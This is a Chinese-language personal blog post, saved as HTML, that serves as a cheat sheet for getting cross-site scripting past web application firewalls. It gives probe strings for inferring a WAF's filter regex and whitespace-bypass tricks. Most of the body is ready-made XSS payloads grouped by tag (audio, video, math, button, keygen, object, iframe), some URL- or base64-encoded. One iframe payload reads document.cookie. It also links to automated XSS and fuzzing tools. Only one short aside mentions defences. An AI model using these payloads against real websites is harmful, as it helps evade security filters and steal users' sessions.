<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="1.XSS绕WAF的各种方式: WAF探测 标签语法替换 空格绕过 请求方式差异规则松懈绕过 异常&#x2F;多种Method方法绕过 超大数据包绕过 字母大小写转换 双关键字绕过  2.自动化工具3.涉及资源 1.XSS绕WAF的各种方式:1.WAF探测:12345678910111213141、&lt;svg – 如果通过，表明没有进行任何标签检测;2、&lt;dev – 如果无法通过，则">
<meta property="og:type" content="article">
<meta property="og:title" content="[WAF绕过]XSS篇">
<meta property="og:url" content="https://github.com/TonyD0g/2022/01/17/WAF%E7%BB%95%E8%BF%87XSS%E7%AF%87/index.html">
<meta property="og:site_name" content="TonyD0g">
<meta property="og:description" content="1.XSS绕WAF的各种方式: WAF探测 标签语法替换 空格绕过 请求方式差异规则松懈绕过 异常&#x2F;多种Method方法绕过 超大数据包绕过 字母大小写转换 双关键字绕过  2.自动化工具3.涉及资源 1.XSS绕WAF的各种方式:1.WAF探测:12345678910111213141、&lt;svg – 如果通过，表明没有进行任何标签检测;2、&lt;dev – 如果无法通过，则">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-01-17T07:19:31.000Z">
<meta property="article:modified_time" content="2023-07-20T07:36:16.359Z">
<meta property="article:author" content="TonyD0g">
<meta property="article:tag" content="WAF绕过">
<meta name="twitter:card" content="summary">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>[WAF绕过]XSS篇</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 4.2.1"></head>

<body class="max-width mx-auto px3 ltr">
    

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        [WAF绕过]XSS篇
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">TonyD0g</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-01-17T07:19:31.000Z" itemprop="datePublished">2022-01-17</time>
        
        (Updated: <time datetime="2023-07-20T07:36:16.359Z" itemprop="dateModified">2023-07-20</time>)
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/WAF%E7%BB%95%E8%BF%87/" rel="tag">WAF绕过</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <span id="more"></span>

<h2 id="1-XSS绕WAF的各种方式"><a href="#1-XSS绕WAF的各种方式" class="headerlink" title="1.XSS绕WAF的各种方式:"></a>1.XSS绕WAF的各种方式:</h2><ol>
<li><strong>WAF探测</strong></li>
<li><strong>标签语法替换</strong></li>
<li><strong>空格绕过</strong></li>
<li><strong>请求方式差异规则松懈绕过</strong></li>
<li><strong>异常&#x2F;多种Method方法绕过</strong></li>
<li><strong>超大数据包绕过</strong></li>
<li>字母大小写转换</li>
<li>双关键字绕过</li>
</ol>
<h2 id="2-自动化工具"><a href="#2-自动化工具" class="headerlink" title="2.自动化工具"></a>2.自动化工具</h2><h2 id="3-涉及资源"><a href="#3-涉及资源" class="headerlink" title="3.涉及资源"></a>3.涉及资源</h2><p><br></p>
<h2 id="1-XSS绕WAF的各种方式-1"><a href="#1-XSS绕WAF的各种方式-1" class="headerlink" title="1.XSS绕WAF的各种方式:"></a>1.XSS绕WAF的各种方式:</h2><h2 id="1-WAF探测"><a href="#1-WAF探测" class="headerlink" title="1.WAF探测:"></a>1.<strong>WAF探测</strong>:</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">1、&lt;svg – 如果通过，表明没有进行任何标签检测;</span><br><span class="line"></span><br><span class="line">2、&lt;dev – 如果无法通过，则为&lt;[a-z]+;</span><br><span class="line"></span><br><span class="line">3、x&lt;dev – 如果通过，则为^&lt;[a-z]+;</span><br><span class="line"></span><br><span class="line">4、&lt;dEv - 如果无法通过，则为&lt;[a-zA-Z]+;</span><br><span class="line"></span><br><span class="line">5、&lt;d3V - 如果无法通过，则为&lt;[a-zA-Z0-9]+;</span><br><span class="line"></span><br><span class="line">6、&lt;d|3v - 如果无法通过，则为&lt;.+;</span><br><span class="line"></span><br><span class="line">如果上述探测均无法通过，则说明目标站点部署的安全机制无法被绕过。不过如此严格的过滤策略误报率非常高，因此不鼓励采用。</span><br><span class="line">如果上述探测方式有一个可行，那么可用来构造Payload的机制就非常多了.</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">进一步猜测用于匹配标签和事件处理器间数据过滤器的正则表达式:</span><br><span class="line">1、&lt;tag xxx - 如果无法通过，则为&#123;space&#125;;</span><br><span class="line"></span><br><span class="line">2、&lt;tag%09xxx - 如果无法通过，则为[\s];</span><br><span class="line"></span><br><span class="line">3、&lt;tag%09%09xxx - 如果无法通过，则为\s+;</span><br><span class="line"></span><br><span class="line">4、&lt;tag/xxx - 如果无法通过，则为[\s/]+;</span><br><span class="line"></span><br><span class="line">5、&lt;tag%0axxx- 如果无法通过，则为[\s\n]+;</span><br><span class="line"></span><br><span class="line">6、&lt;tag%0dxxx&gt;- 如果无法通过，则为[\s\n\r+]+;</span><br><span class="line"></span><br><span class="line">7、&lt;tag/~/xxx - 如果无法通过，则为.*+;</span><br></pre></td></tr></table></figure>

<h2 id="2-标签语法替换"><a href="#2-标签语法替换" class="headerlink" title="2.标签语法替换:"></a>2.<strong>标签语法替换</strong>:</h2><p>常见的WAF过滤的标签(这类黑名单容易遗漏标签和事件属性，防护上不能只依赖它，还应在输出端做上下文编码并配合CSP):</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;  &lt;a&gt;  &lt;p&gt;  &lt;img&gt;  &lt;body&gt; &lt;button&gt;  &lt;var&gt;  &lt;div&gt;  &lt;iframe&gt;  &lt;object&gt; &lt;input&gt; </span><br><span class="line">&lt;textarea&gt;  &lt;keygen&gt; &lt;frameset&gt;  &lt;embed&gt;  &lt;svg&gt;  &lt;math&gt;  &lt;video&gt;  &lt;audio&gt; &lt;select&gt;</span><br></pre></td></tr></table></figure>

<p>audio:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;audio src=x onerror=alert(47)&gt;</span><br><span class="line">&lt;audio src=x onerror=prompt(1);&gt;</span><br><span class="line">&lt;audio src=1 href=1 onerror=&quot;javascript:alert(1)&quot;&gt;&lt;/audio&gt;</span><br></pre></td></tr></table></figure>

<p>video:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;video src=x onerror=prompt(1);&gt;</span><br><span class="line">&lt;video src=x onerror=alert(48)&gt;</span><br></pre></td></tr></table></figure>

<p>div:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;div style=&quot;width:expression(alert(/1/))&quot;&gt;1&lt;/div&gt;     ie浏览器执行</span><br><span class="line">&lt;div onmouseover%3d&#x27;alert%26lpar%3b1%26rpar%3b&#x27;&gt;DIV&lt;%2fdiv&gt;   url编码绕过</span><br></pre></td></tr></table></figure>

<p>math:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;math&gt;&lt;a/xlink:href=javascript:prompt(1)&gt;Xss</span><br><span class="line"></span><br><span class="line">&lt;math href=&quot;javascript:javascript:alert(1)&quot;&gt;Xss&lt;/math&gt;</span><br></pre></td></tr></table></figure>

<p>button:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;button onfocus=alert(1) autofocus&gt;</span><br><span class="line">&lt;button/onclick=alert(1) &gt;xss&lt;/button&gt;</span><br></pre></td></tr></table></figure>

<p>keygen:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;keygen/onfocus=prompt(1);&gt;</span><br><span class="line">&lt;keygen onfocus=javascript:alert(1) autofocus&gt;</span><br></pre></td></tr></table></figure>

<p>object:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;object data=&quot;data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==&quot;&gt;&lt;/object&gt;</span><br><span class="line"></span><br><span class="line">base64编码：PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg    </span><br><span class="line">      解码：&lt;script&gt;alert(1)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>iframe:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;IFRAME width%3d&quot;420&quot; height%3d&quot;315&quot; frameborder%3d&quot;0&quot; onload%3d&quot;alert(document.cookie)&quot;&gt;&lt;%2fIFRAME&gt;</span><br><span class="line">&lt;iframe%2fsrc%3d&quot;data%3atext%2fhtml%3b%26Tab%3bbase64%26Tab%3b,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg%3d%3d&quot;&gt;</span><br><span class="line">&lt;iframe srcdoc%3d&#x27;%26lt%3bbody onload%3dprompt%26lpar%3b1%26rpar%3b%26gt%3b&#x27;&gt;</span><br></pre></td></tr></table></figure>

<h2 id="3-空格绕过"><a href="#3-空格绕过" class="headerlink" title="3. 空格绕过:"></a>3. <strong>空格绕过</strong>:</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/**/ , %09</span><br></pre></td></tr></table></figure>

<h2 id="4-请求方式差异规则松懈绕过"><a href="#4-请求方式差异规则松懈绕过" class="headerlink" title="4. 请求方式差异规则松懈绕过:"></a>4. <strong>请求方式差异规则松懈绕过</strong>:</h2><p>详见[WAF绕过]SQL注入篇: <strong>3. 请求方式差异规则松懈绕过</strong></p>
<h2 id="5-异常-多种Method方法绕过"><a href="#5-异常-多种Method方法绕过" class="headerlink" title="5. 异常&#x2F;多种Method方法绕过:"></a>5. <strong>异常&#x2F;多种Method方法绕过</strong>:</h2><p>详见[WAF绕过]SQL注入篇: <strong>4. 异常&#x2F;多种Method方法绕过</strong></p>
<h2 id="6-超大数据包绕过"><a href="#6-超大数据包绕过" class="headerlink" title="6. 超大数据包绕过:"></a>6. <strong>超大数据包绕过</strong>:</h2><p>详见[WAF绕过]SQL注入篇: <strong>5. 超大数据包绕过</strong></p>
<h2 id="7-字母大小写转换"><a href="#7-字母大小写转换" class="headerlink" title="7. 字母大小写转换:"></a>7. 字母大小写转换:</h2><p>详见[WAF绕过]SQL注入篇: <strong>16. 字母大小写转换</strong></p>
<h2 id="8-双关键字绕过"><a href="#8-双关键字绕过" class="headerlink" title="8. 双关键字绕过:"></a>8. 双关键字绕过:</h2><p>详见[WAF绕过]SQL注入篇: <strong>17. 双关键字绕过</strong></p>
<h2 id="2-自动化工具-1"><a href="#2-自动化工具-1" class="headerlink" title="2.自动化工具:"></a>2.自动化工具:</h2><p>1.XSStrike</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://github.com/s0md3v/XSStrike</span><br></pre></td></tr></table></figure>

<h2 id="3-涉及资源-1"><a href="#3-涉及资源-1" class="headerlink" title="3.涉及资源:"></a>3.<strong>涉及资源</strong>:</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">https://github.com/do0dl3/xss-labs</span><br><span class="line"></span><br><span class="line">https://gitee.com/yhtmxl/imxss/</span><br><span class="line"></span><br><span class="line">https://github.com/3xp10it/xwaf</span><br><span class="line"></span><br><span class="line">https://xssfuzzer.com/fuzzer.html</span><br><span class="line"></span><br><span class="line">https://github.com/s0md3v/XSStrike</span><br><span class="line"></span><br><span class="line">https://bbs.pediy.com/thread-250852.htm</span><br><span class="line"></span><br><span class="line">https://github.com/TheKingOfDuck/fuzzDicts</span><br></pre></td></tr></table></figure>

<h2 id="学习来源"><a href="#学习来源" class="headerlink" title="学习来源:"></a>学习来源:</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">第二十八天waf绕过:</span><br><span class="line">https://www.yuque.com/weiker/xiaodi/nqcvum</span><br><span class="line"></span><br><span class="line">看我如何绕过WAF的XSS检测机制:</span><br><span class="line">https://www.freebuf.com/articles/web/200180.html</span><br></pre></td></tr></table></figure>


  </div>
</article>



        

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2023
    TonyD0g
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>



<script src="/js/main.js"></script>



</body>
</html>
